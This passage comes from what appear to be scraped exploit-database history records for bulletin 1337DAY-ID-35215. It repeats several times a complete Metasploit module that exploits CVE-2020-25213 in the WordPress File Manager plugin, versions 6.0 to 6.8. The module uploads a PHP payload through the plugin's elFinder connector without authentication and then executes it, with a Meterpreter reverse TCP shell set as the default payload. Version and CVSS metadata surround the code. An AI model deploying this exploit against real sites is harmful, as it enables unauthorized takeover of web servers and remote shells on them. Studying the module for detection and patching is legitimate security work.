Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-19] #", "category": "", "verified": false}, "lastseen": "2021-10-18T22:21:11", "differentElements": ["sourceData"], "edition": 46}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "ca2952ef4c374ff7709d56d3c059c883", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-20T22:18:11", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-20T22:18:11", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-20T22:18:11", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-21] #", "category": "", "verified": false}, "lastseen": "2021-10-20T22:18:11", "differentElements": ["sourceData"], "edition": 47}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "ac225093bae924e8e68b14ac796d772b", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-22T08:42:01", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-22T08:42:01", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-22T08:42:01", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-22] #", "category": "", "verified": false}, "lastseen": "2021-10-22T08:42:01", "differentElements": ["sourceData"], "edition": 48}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "4d26ad5a16e6709878d15455470d802a", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-23T16:11:38", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-22T08:42:01", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-22T08:42:01", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-23] #", "category": "", "verified": false}, "lastseen": "2021-10-23T16:11:38", "differentElements": ["sourceData"], "edition": 49}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "a2d458db76a8f59284fb13cc1b885326", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-24T00:17:36", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": 